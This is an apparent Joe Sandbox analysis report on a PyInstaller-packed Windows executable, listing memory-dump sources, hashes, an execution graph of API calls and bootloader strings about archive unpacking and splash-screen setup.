                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                      • String ID: csm
                                                                                      • API String ID: 2573137834-1018135373
                                                                                      • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                      • Instruction ID: 51a07d2670193f30fdf77a6b3df9b0849c16a08b4fc514a6daec13f5d6cca019
                                                                                      • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                      • Instruction Fuzzy Hash: 2E116032609B8182EB619F25F440259B7E4FB88B98F584230DF9D1B798DF3CD551CB40
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: DriveType_invalid_parameter_noinfo
                                                                                      • String ID: :
                                                                                      • API String ID: 2595371189-336475711
                                                                                      • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                      • Instruction ID: 015f66b4f2a5ee5cba2f5e32fa5b8454245007a3e5960606f7366a6863bcd1fe
                                                                                      • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                      • Instruction Fuzzy Hash: 0501F76191C20381F7A4BFB0A4A127EA7A0EF44744FC00135D57D6B2C9DF3CD5448BA4

                                                                                      Execution Graph

                                                                                      Execution Coverage:5.5%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:760
                                                                                      Total number of Limit Nodes:12
22450->22451 22451->22304 22451->22451 22455 7ff7f3def480 22452->22455 22453 7ff7f3def4d3 22591 7ff7f3dea814 37 API calls 2 library calls 22453->22591 22455->22453 22456 7ff7f3def526 22455->22456 22592 7ff7f3def358 71 API calls _fread_nolock 22456->22592 22458 7ff7f3def4fc 22458->22308 22460 7ff7f3ddc850 22459->22460 22461 7ff7f3dd36bc GetModuleFileNameW 22460->22461 22462 7ff7f3dd3710 22461->22462 22463 7ff7f3dd36eb GetLastError 22461->22463 22593 7ff7f3dd9280 FindFirstFileExW 22462->22593 22598 7ff7f3dd2c50 51 API calls _log10_special 22463->22598 22466 7ff7f3dd3706 22470 7ff7f3ddc550 _log10_special 8 API calls 22466->22470 22468 7ff7f3dd3723 22599 7ff7f3dd9300 CreateFileW GetFinalPathNameByHandleW CloseHandle 22468->22599 22469 7ff7f3dd377d 22601 7ff7f3dd9440 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 22469->22601 22474 7ff7f3dd37b5 22470->22474 22473 7ff7f3dd378b 22473->22466 22602 7ff7f3dd2810 49 API calls _log10_special 22473->22602 22474->22353 22481 7ff7f3dd1950 22474->22481 22475 7ff7f3dd3730 22476 7ff7f3dd3734 22475->22476 22477 7ff7f3dd374c __vcrt_InitializeCriticalSectionEx 22475->22477 22600 7ff7f3dd2810 49 API calls _log10_special 22476->22600 22477->22469 22480 7ff7f3dd3745 22480->22466 22482 7ff7f3dd45c0 108 API calls 22481->22482 22483 7ff7f3dd1985 22482->22483 22484 7ff7f3dd1c43 22483->22484 22486 7ff7f3dd7f90 83 API calls 22483->22486 22485 7ff7f3ddc550 _log10_special 8 API calls 22484->22485 22487 7ff7f3dd1c5e 22485->22487 22488 7ff7f3dd19cb 22486->22488 22487->22315 22487->22316 22489 7ff7f3de06d4 73 API calls 22488->22489 22530 7ff7f3dd1a03 22488->22530 22491 7ff7f3dd19e5 22489->22491 22490 7ff7f3de004c 74 API calls 22490->22484 22492 7ff7f3dd1a08 22491->22492 22493 7ff7f3dd19e9 22491->22493 22495 7ff7f3de039c _fread_nolock 53 API calls 22492->22495 22603 7ff7f3de4f08 11 API calls _set_fmode 22493->22603 22497 7ff7f3dd1a20 22495->22497 22496 7ff7f3dd19ee 22604 7ff7f3dd2910 54 API calls _log10_special 22496->22604 22499 
7ff7f3dd1a45 22497->22499 22500 7ff7f3dd1a26 22497->22500 22504 7ff7f3dd1a7b 22499->22504 22505 7ff7f3dd1a5c 22499->22505 22605 7ff7f3de4f08 11 API calls _set_fmode 22500->22605 22502 7ff7f3dd1a2b 22606 7ff7f3dd2910 54 API calls _log10_special 22502->22606 22507 7ff7f3dd1c80 49 API calls 22504->22507 22607 7ff7f3de4f08 11 API calls _set_fmode 22505->22607 22509 7ff7f3dd1a92 22507->22509 22508 7ff7f3dd1a61 22608 7ff7f3dd2910 54 API calls _log10_special 22508->22608 22511 7ff7f3dd1c80 49 API calls 22509->22511 22512 7ff7f3dd1add 22511->22512 22513 7ff7f3de06d4 73 API calls 22512->22513 22514 7ff7f3dd1b01 22513->22514 22515 7ff7f3dd1b35 22514->22515 22516 7ff7f3dd1b16 22514->22516 22517 7ff7f3de039c _fread_nolock 53 API calls 22515->22517 22609 7ff7f3de4f08 11 API calls _set_fmode 22516->22609 22519 7ff7f3dd1b4a 22517->22519 22522 7ff7f3dd1b6f 22519->22522 22523 7ff7f3dd1b50 22519->22523 22520 7ff7f3dd1b1b 22610 7ff7f3dd2910 54 API calls _log10_special 22520->22610 22613 7ff7f3de0110 37 API calls 2 library calls 22522->22613 22611 7ff7f3de4f08 11 API calls _set_fmode 22523->22611 22526 7ff7f3dd1b55 22612 7ff7f3dd2910 54 API calls _log10_special 22526->22612 22527 7ff7f3dd1b89 22527->22530 22614 7ff7f3dd2710 54 API calls _log10_special 22527->22614 22530->22490 22532 7ff7f3dd883a 22531->22532 22533 7ff7f3dd9390 2 API calls 22532->22533 22534 7ff7f3dd8859 GetEnvironmentVariableW 22533->22534 22535 7ff7f3dd8876 ExpandEnvironmentStringsW 22534->22535 22536 7ff7f3dd88c2 22534->22536 22535->22536 22538 7ff7f3dd8898 22535->22538 22537 7ff7f3ddc550 _log10_special 8 API calls 22536->22537 22540 7ff7f3dd88d4 22537->22540 22615 7ff7f3dd9440 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 22538->22615 22540->22325 22541 7ff7f3dd88aa 22542 7ff7f3ddc550 _log10_special 8 API calls 22541->22542 22543 7ff7f3dd88ba 22542->22543 22543->22325 22616 7ff7f3dd6360 22544->22616 22547 7ff7f3dd3399 22589 7ff7f3dd3670 FreeLibrary 22547->22589 22549 7ff7f3dd3381 22549->22547 
22684 7ff7f3dd6050 22549->22684 22551 7ff7f3dd338d 22551->22547 22693 7ff7f3dd61e0 54 API calls 22551->22693 22553->22332 22555 7ff7f3dd7fb4 22554->22555 22556 7ff7f3dd808b __std_exception_destroy 22555->22556 22557 7ff7f3de06d4 73 API calls 22555->22557 22556->22326 22558 7ff7f3dd7fd0 22557->22558 22558->22556 22747 7ff7f3de78c8 22558->22747 22560 7ff7f3dd7fe5 22560->22556 22561 7ff7f3de06d4 73 API calls 22560->22561 22562 7ff7f3de039c _fread_nolock 53 API calls 22560->22562 22561->22560 22562->22560 22563->22353 22564->22353 22565->22336 22566->22340 22567->22345 22568->22347 22569->22359 22570->22353 22571->22366 22572->22353 22573->22377 22574->22353 22575->22365 22577 7ff7f3dd1c80 49 API calls 22576->22577 22578 7ff7f3dd4660 22577->22578 22578->22385 22579->22417 22580->22421 22581->22423 22582->22427 22583->22435 22584->22429 22585->22432 22586->22432 22587->22397 22589->22408 22590->22414 22591->22458 22592->22458 22594 7ff7f3dd92bf FindClose 22593->22594 22595 7ff7f3dd92d2 22593->22595 22594->22595 22596 7ff7f3ddc550 _log10_special 8 API calls 22595->22596 22597 7ff7f3dd371a 22596->22597 22597->22468 22597->22469 22598->22466 22599->22475 22600->22480 22601->22473 22602->22466 22603->22496 22604->22530 22605->22502 22606->22530 22607->22508 22608->22530 22609->22520 22610->22530 22611->22526 22612->22530 22613->22527 22614->22530 22615->22541 22617 7ff7f3dd6375 22616->22617 22618 7ff7f3dd1c80 49 API calls 22617->22618 22619 7ff7f3dd63b1 22618->22619 22620 7ff7f3dd63dd 22619->22620 22621 7ff7f3dd63ba 22619->22621 22622 7ff7f3dd4630 49 API calls 22620->22622 22704 7ff7f3dd2710 54 API calls _log10_special 22621->22704 22624 7ff7f3dd63f5 22622->22624 22625 7ff7f3dd6413 22624->22625 22705 7ff7f3dd2710 54 API calls _log10_special 22624->22705 22694 7ff7f3dd4560 22625->22694 22628 7ff7f3ddc550 _log10_special 8 API calls 22629 7ff7f3dd336e 22628->22629 22629->22547 22647 7ff7f3dd6500 22629->22647 22631 7ff7f3dd642b 22633 7ff7f3dd4630 49 API calls 22631->22633 22632 
7ff7f3dd8e80 3 API calls 22632->22631 22634 7ff7f3dd6444 22633->22634 22635 7ff7f3dd6469 22634->22635 22636 7ff7f3dd6449 22634->22636 22700 7ff7f3dd8e80 22635->22700 22706 7ff7f3dd2710 54 API calls _log10_special 22636->22706 22639 7ff7f3dd6476 22641 7ff7f3dd64c1 22639->22641 22642 7ff7f3dd6482 22639->22642 22640 7ff7f3dd63d3 22640->22628 22708 7ff7f3dd5830 137 API calls 22641->22708 22643 7ff7f3dd9390 2 API calls 22642->22643 22645 7ff7f3dd649a GetLastError 22643->22645 22707 7ff7f3dd2c50 51 API calls _log10_special 22645->22707 22709 7ff7f3dd5400 22647->22709 22649 7ff7f3dd6526 22650 7ff7f3dd653f 22649->22650 22651 7ff7f3dd652e 22649->22651 22716 7ff7f3dd4c90 22650->22716 22734 7ff7f3dd2710 54 API calls _log10_special 22651->22734 22655 7ff7f3dd654b 22735 7ff7f3dd2710 54 API calls _log10_special 22655->22735 22656 7ff7f3dd655c 22659 7ff7f3dd656c 22656->22659 22661 7ff7f3dd657d 22656->22661 22658 7ff7f3dd653a 22658->22549 22736 7ff7f3dd2710 54 API calls _log10_special 22659->22736 22662 7ff7f3dd659c 22661->22662 22663 7ff7f3dd65ad 22661->22663 22737 7ff7f3dd2710 54 API calls _log10_special 22662->22737 22665 7ff7f3dd65bc 22663->22665 22666 7ff7f3dd65cd 22663->22666 22738 7ff7f3dd2710 54 API calls _log10_special 22665->22738 22720 7ff7f3dd4d50 22666->22720 22670 7ff7f3dd65dc 22739 7ff7f3dd2710 54 API calls _log10_special 22670->22739 22671 7ff7f3dd65ed 22673 7ff7f3dd65fc 22671->22673 22674 7ff7f3dd660d 22671->22674 22740 7ff7f3dd2710 54 API calls _log10_special 22673->22740 22676 7ff7f3dd661f 22674->22676 22678 7ff7f3dd6630 22674->22678 22741 7ff7f3dd2710 54 API calls _log10_special 22676->22741 22681 7ff7f3dd665a 22678->22681 22742 7ff7f3de72b0 73 API calls 22678->22742 22680 7ff7f3dd6648 22743 7ff7f3de72b0 73 API calls 22680->22743 22681->22658 22744 7ff7f3dd2710 54 API calls _log10_special 22681->22744 22685 7ff7f3dd6070 22684->22685 22686 7ff7f3dd6099 22685->22686 22692 7ff7f3dd60b0 __std_exception_destroy 22685->22692 22746 7ff7f3dd2710 54 API calls 
_log10_special 22686->22746 22688 7ff7f3dd60a5 22688->22551 22689 7ff7f3dd61bb 22689->22551 22690 7ff7f3dd1470 116 API calls 22690->22692 22691 7ff7f3dd2710 54 API calls 22691->22692 22692->22689 22692->22690 22692->22691 22693->22547 22695 7ff7f3dd456a 22694->22695 22696 7ff7f3dd9390 2 API calls 22695->22696 22697 7ff7f3dd458f 22696->22697 22698 7ff7f3ddc550 _log10_special 8 API calls 22697->22698 22699 7ff7f3dd45b7 22698->22699 22699->22631 22699->22632 22701 7ff7f3dd9390 2 API calls 22700->22701 22702 7ff7f3dd8e94 LoadLibraryExW 22701->22702 22703 7ff7f3dd8eb3 __std_exception_destroy 22702->22703 22703->22639 22704->22640 22705->22625 22706->22640 22707->22640 22708->22640 22711 7ff7f3dd542c 22709->22711 22710 7ff7f3dd5434 22710->22649 22711->22710 22714 7ff7f3dd55d4 22711->22714 22745 7ff7f3de6aa4 48 API calls 22711->22745 22712 7ff7f3dd5797 __std_exception_destroy 22712->22649 22713 7ff7f3dd47d0 47 API calls 22713->22714 22714->22712 22714->22713 22717 7ff7f3dd4cc0 22716->22717 22718 7ff7f3ddc550 _log10_special 8 API calls 22717->22718 22719 7ff7f3dd4d2a 22718->22719 22719->22655 22719->22656 22721 7ff7f3dd4d65 22720->22721 22722 7ff7f3dd1c80 49 API calls 22721->22722 22723 7ff7f3dd4db1 22722->22723 22724 7ff7f3dd1c80 49 API calls 22723->22724 22733 7ff7f3dd4e33 __std_exception_destroy 22723->22733 22725 7ff7f3dd4df0 22724->22725 22728 7ff7f3dd9390 2 API calls 22725->22728 22725->22733 22726 7ff7f3ddc550 _log10_special 8 API calls 22727 7ff7f3dd4e7e 22726->22727 22727->22670 22727->22671 22729 7ff7f3dd4e06 22728->22729 22730 7ff7f3dd9390 2 API calls 22729->22730 22731 7ff7f3dd4e1d 22730->22731 22732 7ff7f3dd9390 2 API calls 22731->22732 22732->22733 22733->22726 22734->22658 22735->22658 22736->22658 22737->22658 22738->22658 22739->22658 22740->22658 22741->22658 22742->22680 22743->22681 22744->22658 22745->22711 22746->22688 22748 7ff7f3de78f8 22747->22748 22751 7ff7f3de73d4 22748->22751 22750 7ff7f3de7911 22750->22560 22752 7ff7f3de73ef 22751->22752 22753 
7ff7f3de741e 22751->22753 22762 7ff7f3dea814 37 API calls 2 library calls 22752->22762 22761 7ff7f3de546c EnterCriticalSection 22753->22761 22756 7ff7f3de740f 22756->22750 22757 7ff7f3de7423 22758 7ff7f3de7440 38 API calls 22757->22758 22759 7ff7f3de742f 22758->22759 22760 7ff7f3de5478 _fread_nolock LeaveCriticalSection 22759->22760 22760->22756 22762->22756 22902 7ffe126c69f0 21 API calls __unDName 22845 7ffe126c5327 15 API calls 5 library calls 22846 7ff7f3ddcb50 57 API calls 2 library calls 22903 7ff7f3de9d50 11 API calls 22904 7ff7f3df7d50 CloseHandle 22848 7ffe126c4be4 free 22880 7ffe126c44e4 43 API calls 4 library calls 22815 7ff7f3ddcc20 38 API calls 2 library calls 22849 7ff7f3ddd320 54 API calls 22816 7ff7f3df7c20 65 API calls 22908 7ff7f3dec520 47 API calls _isindst 22910 7ffe126d0558 21 API calls _DllMainCRTStartup 22819 7ffe126c2ac0 14 API calls 2 library calls 22851 7ffe126c6bc0 9 API calls __vcrt_getptd_noinit 22763 7ff7f3de5628 22764 7ff7f3de565f 22763->22764 22765 7ff7f3de5642 22763->22765 22764->22765 22766 7ff7f3de5672 CreateFileW 22764->22766 22788 7ff7f3de4ee8 11 API calls _set_fmode 22765->22788 22768 7ff7f3de56a6 22766->22768 22769 7ff7f3de56dc 22766->22769 22791 7ff7f3de577c 59 API calls 3 library calls 22768->22791 22792 7ff7f3de5c04 46 API calls 3 library calls 22769->22792 22770 7ff7f3de5647 22789 7ff7f3de4f08 11 API calls _set_fmode 22770->22789 22774 7ff7f3de56b4 22777 7ff7f3de56d1 CloseHandle 22774->22777 22778 7ff7f3de56bb CloseHandle 22774->22778 22775 7ff7f3de56e1 22779 7ff7f3de56e5 22775->22779 22780 7ff7f3de5710 22775->22780 22776 7ff7f3de564f 22790 7ff7f3dea8e0 37 API calls _invalid_parameter_noinfo 22776->22790 22785 7ff7f3de565a 22777->22785 22778->22785 22793 7ff7f3de4e7c 11 API calls 2 library calls 22779->22793 22794 7ff7f3de59c4 51 API calls 22780->22794 22784 7ff7f3de571d 22795 7ff7f3de5b00 21 API calls _fread_nolock 22784->22795 22787 7ff7f3de56ef 22787->22785 22788->22770 22789->22776 22790->22785 22791->22774 
22792->22775 22793->22787 22794->22784 22795->22787 22881 7ff7f3ddda28 45 API calls 22820 7ffe126d1ac0 14 API calls __CxxDetectRethrow

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastModuleName
                                                                                      • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                      • API String ID: 2776309574-4232158417

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                      • String ID:
                                                                                      • API String ID: 1617910340-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID:
                                                                                      • API String ID: 2295610775-0

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7F3DD7F90: _fread_nolock.LIBCMT ref: 00007FF7F3DD803A
                                                                                      • _fread_nolock.LIBCMT ref: 00007FF7F3DD1A1B
                                                                                        • Part of subcall function 00007FF7F3DD2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7F3DD1B6A), ref: 00007FF7F3DD295E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _fread_nolock$CurrentProcess
                                                                                      • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                      • API String ID: 2397952137-3497178890
                                                                                      • Opcode ID: 27547418d9ab5e62463e202343d91a8db4d430f9fb0a7f3bbb020ab973e08554
                                                                                      • Instruction ID: c0abb39bb4e068bbccd6192fcc26d7cc6bf6f57499df95413ff2afa3bbc1c1a6
                                                                                      • Opcode Fuzzy Hash: 27547418d9ab5e62463e202343d91a8db4d430f9fb0a7f3bbb020ab973e08554
                                                                                      • Instruction Fuzzy Hash: C9819271A0D68385EBE0EBA4D0412B9B3A4FF48744F844531E9AD6B7C9DE3CE58587A0

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                      • String ID: P%
                                                                                      • API String ID: 2147705588-2959514604
                                                                                      • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                      • Instruction ID: 8e49502afe0649f0e048a1c0c177276a1f758f142f0379655705d5355395b2fc
                                                                                      • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                      • Instruction Fuzzy Hash: B2510626608BA186D7749F36A4581BAF7A1FB98B65F004131EFEE47694DF3CD085CB20

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                      • API String ID: 2050909247-3659356012
                                                                                      • Opcode ID: 0415811bb7329ddca4e4a244178c4befdf0ff72a6341d4c7f046017dd740e2c3
                                                                                      • Instruction ID: 1707ef3a49e271e07163ff1ddbfb7564dd7ab755d4cf15c5305be77f46131eea
                                                                                      • Opcode Fuzzy Hash: 0415811bb7329ddca4e4a244178c4befdf0ff72a6341d4c7f046017dd740e2c3
                                                                                      • Instruction Fuzzy Hash: AE418D21A0864386EB90EBA1A4412B9F3A4EF44784FC44532ED6D2BBD9DE3CE541C7A1

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                      • API String ID: 2050909247-2813020118
                                                                                      • Opcode ID: 698b21169e7bd12c857e57f237555d9e116291535cd7e4395843bf29195d2337
                                                                                      • Instruction ID: d1f98d6a146640630b6d44f97480d82eaf7043d5bf68b8ae6c1c38cafc661599
                                                                                      • Opcode Fuzzy Hash: 698b21169e7bd12c857e57f237555d9e116291535cd7e4395843bf29195d2337
                                                                                      • Instruction Fuzzy Hash: F3510622A0964341EBE4BBA1A4403BAB691FF44794FC44135ED6D6B7C5DE3CE441C790

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetModuleFileNameW.KERNEL32(?,00007FF7F3DD3804), ref: 00007FF7F3DD36E1
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD3804), ref: 00007FF7F3DD36EB
                                                                                        • Part of subcall function 00007FF7F3DD2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F3DD3706,?,00007FF7F3DD3804), ref: 00007FF7F3DD2C9E
                                                                                        • Part of subcall function 00007FF7F3DD2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F3DD3706,?,00007FF7F3DD3804), ref: 00007FF7F3DD2D63
